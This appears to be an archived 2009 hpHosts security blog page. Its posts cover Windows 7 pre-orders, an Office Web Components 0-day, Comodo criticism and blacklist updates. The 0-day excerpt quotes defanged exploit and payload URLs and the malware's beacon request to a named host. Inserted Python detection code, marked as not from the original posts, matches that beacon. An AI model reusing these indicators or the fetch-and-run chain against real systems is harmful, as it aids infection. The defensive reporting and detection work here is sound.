Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday, 14 July 2009

Let the Windows 7 pre-order madness begin!

I am pleased to inform those of you in the UK, that you can now pre-order the brand new Windows 7, due for release in October, for as little as £49 for Home Premium, and £99 for the Professional edition - that's quite the saving. You've got to hurry however, as stocks are limited and it's pretty much a guarantee that these are going to sell out rather quickly (going to be ordering it myself when I get my paycheck in August).

The following are the full details;

At midnight on Wednesday 15 July, Microsoft’s new operating system, Windows 7, goes on pre-sale to people in the UK at a special introductory price, but you’ll have to be quick as prices are low, stocks are limited and it is first come first served!

To say thanks to its loyal customers and enthusiasts, especially those who have taken part in the Beta and Release Candidate (RC) programmes, Microsoft will be offering pre-order copies of Windows 7 at one-off promotional prices* of £49.99 for Home Premium and £99.99 for Professional. This is a great opportunity for your readers to get their hands on the best Windows operating system of all time and save plenty of money in the process.

The Windows 7 Beta and RC versions have been very well received by consumers and media alike, and both have been downloaded by millions of people worldwide. To pre-order a discounted copy of the final version of Windows 7 you need to contact our selected retail partners listed below or go to www.microsoft.com/uk/win7preorder.

Finally, a quick reminder for our UK customers: if you are replacing an older version of Windows with Windows 7 once it arrives on 22 October, a clean install of the operating system and the installation of an internet browser will be required. For more information on how to do this go to www.microsoft.com/uk/win7preorder and for general information on other aspects of Windows 7, please visit www.microsoft.co.uk/windows.


Partner list:

Microsoft Store - http://emea.microsoftstore.com/UK/Microsoft/Windows/Windows-Vista/Windows-7-Preview
Amazon.co.uk - http://www.amazon.co.uk/s/?ie=UTF8&rh=i%3Aaps%2Ck%3AB002DUCMT2|B002DUCMTC|B001XCWGII
Comet - http://www.comet.co.uk/shopcomet/advice/758/Windows-7
Currys - www.currys.co.uk/preorder
Ebuyer.com - TBC
Play.com - http://www.play.com/PC/PCs/3-/379971/2-/Promo.html
Littlewoods - TBC
Micro Anvika - www.anvika.com/windows7preorder
PCWorld - www.pcworld.co.uk/preorder
Staples - http://www.staples.co.uk/ENG/static/wrapper.asp?param=windows7/windows7.htm&ns_campaign=Microsoft_Windows_7&ns_mchannel=BA-ext&ns_source=Microsoft&ns_linkname=Microsoft_Windows_7&ns_fees=0&sec_type=ext
Argos - www.argos.co.uk
John Lewis - http://www.johnlewispartnership.co.uk/
Tesco - http://direct.tesco.com/p/inc/specials/windows7/
Dixons - www.dixons.co.uk/preorder

Who is Exploiting the Office Web Components 0-day?

Just a day before Patch Tuesday, when Microsoft is going to release a couple of patches for DirectShow vulnerabilities, including the MSVIDCTRL 0-day, IE (Internet Explorer) users are hit by another surprise. A new 0-day vulnerability has been identified in the MS Office Web Components control and is currently being exploited via the IE scripting interface. There is no patch available at the moment, but MS has come up with a workaround.

One of the malicious URLs which has been found to exploit this vulnerability is hxxp://www.fdsdffdfsf.cn/of.htm.

Here is what the exploit page looks like:

....

If successfully exploited, the above shellcode fetches a malware binary from hxxp://www.fdasfadf.cn/new.exe.

Let's see what the actual payload, i.e. new.exe, is all about.

Here is the VirusTotal report for new.exe

Upon execution this malware produces outbound communication like this:

GET /hao.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.98765W; Windows NT 5.1; SV1)
Host: www.qvod69.cn
Connection: Keep-Alive


Read more
http://blog.fireeye.com/research/2009/07/who-is-exploiting-office-web-components-0day.html?cid=6a00d835018afd53ef0115720324c1970b
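Added example (not from the FireEye post or this blog): a small checker that parses a raw HTTP request and flags the beacon above two ways, by the quoted host/path and by the malformed MSIE version token in its User-Agent, which is a heuristic worth running over proxy logs. The benign request is constructed for contrast.

```python
import re

# Indicators quoted in the post: the beacon the dropped new.exe sends out.
BEACON_HOST = "www.qvod69.cn"
BEACON_PATH = "/hao.txt"
# Heuristic: IE sends "MSIE <major>.<minor>;". The beacon's "MSIE 6.0.98765W"
# has junk appended to the version, so anything after major.minor is flagged.
MSIE_TOKEN = re.compile(r"MSIE (\d+\.\d+)([^;)]*)")

def parse_request(raw):
    """Parse a raw HTTP request (request line plus headers) into a dict."""
    lines = [l for l in raw.strip().splitlines() if l.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}

def malformed_msie_token(user_agent):
    """True when the MSIE version token carries extra characters."""
    m = MSIE_TOKEN.search(user_agent)
    return bool(m) and m.group(2) != ""

def classify(raw):
    """Return the reasons a request matches the beacon; empty list if none."""
    req = parse_request(raw)
    hdr = req["headers"]
    reasons = []
    if hdr.get("host", "").lower() == BEACON_HOST and req["path"] == BEACON_PATH:
        reasons.append("known beacon host/path")
    if malformed_msie_token(hdr.get("user-agent", "")):
        reasons.append("malformed MSIE version token in User-Agent")
    return reasons

# The request as quoted in the post.
BEACON = """GET /hao.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.98765W; Windows NT 5.1; SV1)
Host: www.qvod69.cn
Connection: Keep-Alive
"""
# Constructed benign request with a well-formed IE6 User-Agent, for contrast.
BENIGN = """GET /index.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.example.com
Connection: Keep-Alive
"""
```

The version-token check on its own will also flag legitimate oddities such as beta builds, so treat it as a triage signal rather than a block rule.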

References:

Office Web Components exploits in the wild
http://www.malwaredomainlist.com/forums/index.php?topic=3123.0

Monday, 13 July 2009

Update to sURL

In light of the following, I've modified the sURL service to prevent short URLs being created that point to other known short URL providers.

http://blog.flo.cx/2009/06/loops-and-stretching-with-urlshorteners

If you find a short URL that is allowed, please let me know (I think I've covered them all, but I'm prone to error just like everyone else ;o)).
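As an added illustration (not the sURL service's own code) of the check described above, here is one way to refuse short URL creation when the target is, or redirects to, another known shortener, with a hop cap so the redirect loops discussed in the linked post are caught. The shortener list and the redirect table are constructed for the example.

```python
from urllib.parse import urlparse

# Illustrative list of other shortener hosts (constructed; the service's real
# list is not shown in the post). Matching is on the hostname, minus "www.".
KNOWN_SHORTENERS = {"bit.ly", "tinyurl.com", "is.gd"}
MAX_HOPS = 5  # cap on redirects followed when resolving a target

def host_of(url):
    host = (urlparse(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host

def is_shortener(url):
    return host_of(url) in KNOWN_SHORTENERS

def resolve(url, fetch_location, max_hops=MAX_HOPS):
    """Follow redirects using fetch_location(url) -> Location header or None.
    Returns (final_url, reason): reason is None when the chain ended normally,
    'loop' when a URL repeats, or 'too_many_hops' when the cap is hit."""
    seen = [url]
    for _ in range(max_hops):
        nxt = fetch_location(url)
        if nxt is None:
            return url, None
        if nxt in seen:
            return nxt, "loop"
        seen.append(nxt)
        url = nxt
    return url, "too_many_hops"

def check_target(url, fetch_location):
    """Policy check run before a short URL is created. Returns (ok, reason)."""
    if is_shortener(url):
        return False, "target is itself a known short URL provider"
    final, reason = resolve(url, fetch_location)
    if reason:
        return False, f"redirect chain {reason}"
    if is_shortener(final):
        return False, "target redirects to a known short URL provider"
    return True, "ok"

# Constructed redirect table standing in for live HEAD requests.
REDIRECTS = {
    "http://example.org/a": "http://example.org/b",
    "http://example.org/b": "http://example.org/a",   # two-hop loop
    "http://example.net/go": "http://bit.ly/abc123",  # hides a shortener
}

def fake_fetch(url):
    return REDIRECTS.get(url)
```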

Microsoft Security Advisory (973472)

Go get it folks!

Microsoft Security Advisory (973472)

Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution

Microsoft is investigating a privately reported vulnerability in Microsoft Office Web Components. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. When using Internet Explorer, code execution is remote and may not require any user intervention.

We are aware of attacks attempting to exploit the vulnerability.

Customers may prevent the Microsoft Office Web Components from running in Internet Explorer either manually, using the instructions in the Workaround section, or automatically, using the solution found in Microsoft Knowledge Base Article 973472.

Fix It solution is available and applies to:
Microsoft Office Small Business Accounting 2006
Microsoft Office 2003 Web Components for the 2007 Microsoft Office system
Microsoft Office 2003 Service Pack 3
Microsoft Office 2003 Web Components
Microsoft Internet Security and Acceleration Server 2004 Standard Edition

Fix It solution is in http://support.microsoft.com/kb/973472
More info on this security advisory in http://blogs.technet.com/msrc/archive/2009/07/13/microsoft-security-advisory-973472-released.aspx
http://www.microsoft.com/technet/security/advisory/973472.mspx


Special thanks to Donna and Corrine for the heads up.

Microsoft Security Advisory (973472) - FixIt solution is available
http://msmvps.com/blogs/donna/archive/2009/07/14/microsoft-security-advisory-973472-released-fixit-solution-is-available.aspx

Microsoft Security Advisory 973472 Released
http://securitygarden.blogspot.com/2009/07/microsoft-security-advisory-973472.html

Now I've got to figure out why the advisory hasn't come to my inbox yet .....

Major addition to hpHosts blacklist

Just a note folks, after identifying some new Internet Service Team ranges, I am currently in the process of adding over 3000 new entries to the database. I am seriously wishing the HOSTS file allowed blocking IP ranges, as this could've easily been accomplished by adding the following single line to the blacklist (which is what you can add to your firewall filter if you've not already done so).

217.20.112.0, 217.20.127.255

This block is used by the IST, and owned, surprise surprise, by NetDirekt (yep, I already knew that, which is why it's not a surprise). 217.20.112.* is already in hpHosts, but 113-127 is not (at least, not completely, little scraps here and there were already in the database).

You can see all of the IP ranges I am aware of that are in use by the IST at;

hosts-file.net/pest.asp?show=internetserviceteam
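Added example, not hpHosts code: using the range quoted above, it collapses the first/last pair into the CIDR block a firewall rule would take, checks membership, and works out which /24s inside it still need adding. The already-listed block is assumed from the note that 217.20.112.* is in the database.

```python
import ipaddress

# The IST block quoted in the post, as the "first, last" firewall line.
IST_RANGE = ("217.20.112.0", "217.20.127.255")
# Assumed from the post: this /24 is already in hpHosts, the rest is not.
ALREADY_LISTED = ["217.20.112.0/24"]

def range_to_cidrs(first, last):
    """Collapse an inclusive first..last range into the fewest CIDR blocks."""
    return [str(n) for n in ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last))]

def contains(cidrs, ip):
    """True when ip falls inside any of the given CIDR blocks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(c) for c in cidrs)

def missing_subnets(first, last, listed, prefix=24):
    """Return the /prefix subnets inside first..last not covered by `listed`."""
    listed_nets = [ipaddress.ip_network(c) for c in listed]
    missing = []
    for block in ipaddress.summarize_address_range(
            ipaddress.ip_address(first), ipaddress.ip_address(last)):
        # A block already smaller than /prefix cannot be split; keep it whole.
        subs = block.subnets(new_prefix=prefix) if block.prefixlen <= prefix else [block]
        for sub in subs:
            if not any(sub.subnet_of(n) for n in listed_nets):
                missing.append(str(sub))
    return missing

if __name__ == "__main__":
    print("firewall block:", range_to_cidrs(*IST_RANGE))
    print("still to add:", missing_subnets(*IST_RANGE, ALREADY_LISTED))
```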

References:

Google poisoning, IST, rogues and 250+ reasons to avoid 209.44.* ......
http://hphosts.blogspot.com/2009/05/google-poisoning-ist-rogues-and-250.html

IST (Internet Service Team - *.internetserviceteam.com) in blackhat SEO campaign - again
http://hphosts.blogspot.com/2009/05/ist-internet-service-team.html

MalwareURL: Internet Service Team
http://www.malwareurl.com/search.php?domain=&s=internetserviceteam&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on&ns=on

MalwareURL: AS28753
http://www.malwareurl.com/search.php?domain=&s=AS28753&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on

MalwareDomainList: Internet Service Team
http://malwaredomainlist.com/mdl.php?search=internetserviceteam&colsearch=All&quantity=50

hpHosts network down

I'm sorry to inform you all, due to a power cut a few minutes ago, the entire hpHosts network is currently offline (having to post this from a rubbish 3G connection).

I've spoken to the power company who informed they are aware of the problem and expect it to be back online by 8am (approx 1 hour 10 minutes). Hopefully it hasn't fried the servers again (on surge protectors, so shouldn't have).

Apologies for the inconvenience folks.

/edit 07:02

I'm pleased to announce, the power is back online, and all servers are online and functioning properly.

Sunday, 12 July 2009

Comodo: Watch your staff please (oh and a little correction)

Not content with Melih blaming MS MVP Donna Buenaventura for a blog posting by someone else, one of Melih's moderators has gone one step further and posted;

"We should hack her site and post the truth"

Let me make this VERY clear Melih, and I suggest your staff take note. Whether meant seriously or not, this kind of behaviour from self-claimed "professionals" working for an alleged, legit security company is NOT going to do you any favours - quite the opposite.

Looking at the comments on Mike's blog concerning this shows the Comodo supporters have also not bothered to take note of who actually owns that blog - and it's not Donna. This one for example, by another of Comodo's moderators, shows they evidently don't practice what they preach;

http://msmvps.com/blogs/hostsnews/archive/2009/07/10/1699205.aspx#1699791

Though this does make for hilarious reading (and a major thanks to Mike for publishing them ;o)).

References:

Comodo and the ongoing trust saga
http://hphosts.blogspot.com/2009/07/comodo-and-ongoing-trust-saga.html

Comodo continue to issue certificates to known Malware
http://www.calendarofupdates.com/updates/index.php?showtopic=19279

Comodo and the ongoing trust saga

Several issues have been brought to light about Comodo over the past lord knows how long, and the latest incident, as with many before it, concerns their SSL certs. In this case, Melih's defense is that these are DV certs, and thus do not require "validation" as to the identity of the person obtaining them - this might be the case, but when your tag line is "Creating Trust Online", your defense should NOT be to try and slag off those bringing such to light, or to tell them to get in touch with someone else to get this sorted out - IT IS YOUR COMPANY, YOUR CERTIFICATES - YOUR PROBLEM!

If DV certs do not require validation as to the identity, or anything else, of the person obtaining them, there's a simple solution - STOP PROVIDING THEM! Surely you have a choice as to the type of certificate you can issue?

Even if you are forced to offer DV certs, you still have a responsibility to monitor the use of such, and if you don't have the staff to do so, then either hire more staff or STOP ISSUING CERTIFICATES UNTIL YOU HAVE THE INFRASTRUCTURE TO PROPERLY MONITOR SUCH!

As far as HopSurf goes, I really couldn't care less who owns it or who developed it - Comodo is allegedly a security company; again, the tag line comes into play here - Creating Trust Online. Let's see how NOT to create trust, shall we?

1. Thou shalt require those installing HopSurf be over 18
2. Thou shalt ensure the toolbar is PRE-TICKED

Yep, great way to create trust there ....

Requiring those installing HopSurf be over 18 implies that the content it provides is of an adult nature and thus unsuitable for minors - you do not restrict the ages of those installing your other products, and more importantly (and why I have to point this out AGAIN is beyond me), YOU ARE A SECURITY COMPANY, YOU HAVE NO BUSINESS BEING INVOLVED IN ADULT ONLY CONTENT!!!

References:

Is Comodo President/CEO a Liar? You Decide
http://securitygarden.blogspot.com/2009/07/is-comodo-presidentceo-liar-you-decide.html

Here we go again..
http://forums.comodo.com/empty-t42573.0.html;msg288724;topicseen

Parents, beware of Comodo firewall
http://securitygarden.blogspot.com/2009/07/parents-beware-of-comodo-firewall.html

Comodo continues to damage it's reputation
http://msmvps.com/blogs/hostsnews/archive/2009/07/10/1699205.aspx

Comodo STILL supporting the criminal fraternity (the bad guys)
http://hphosts.blogspot.com/2009/07/comodo-still-supporting-criminal.html

Saturday, 11 July 2009

Tagged.com being sued - and about bloody time too!

Tagged.com, well known for quite some time for using the same malicious tactics as a few other like sites I could mention, is finally to be sued by the New York Attorney General.

New York Attorney General Andrew Cuomo charged social networking site Tagged.com Thursday with spamming and stealing identities from 60 million of its users by sending illegal e-mails that raided their personal contact lists.

Cuomo served Tagged with a notice of intent, announcing that his office planned to sue the social networking site for concocting an illegal scheme to bolster traffic numbers and reel in millions of new users.

"This company stole the address books and identities of millions of people," Cuomo said in a statement. "Consumers had their privacy invaded and were forced into the embarrassing position of having to apologize to all their e-mail contacts for Tagged's unethical -- and illegal -- behavior."

San Francisco-based Tagged.com boasts 80 million users and touts itself as the third largest social networking site after Facebook and MySpace.

According to the notice of intent, Cuomo charged that Tagged tricked most of those users into handing over access to their e-mail contact lists. The company then used the contact lists to send out promotional spam that appeared as if it was coming from a personal contact. In actuality, the fraudulent e-mails were sent by Tagged from pilfered contact lists, the New York Attorney General's Office said.


Read more
http://www.crn.com/security/218401533;jsessionid=2HQKNHDMVIQC2QSNDLPSKH0CJUNN2JVN

Friday, 10 July 2009

Comcast using unethical tactics to force crapvertising on users

First Verisign, then lord knows who else, and now Comcast it seems, want to force advertising on their users, using tactics that are unethical at best, and blackhat at worst. Worse still, as Randy describes, they're making users that want to opt-out jump through hoops, instead of going the ethical route of opt-in.

Read more
http://www.eset.com/threat-center/blog/?p=1300

If you aren't already, switch your Comcast (and any others, for those of you not with Comcast) DNS servers to OpenDNS;

www.opendns.com

Yes, OpenDNS also redirects 404s, but the difference is, they're up front about it, and you can turn it off by unticking a box (they're also not charging you for using their services).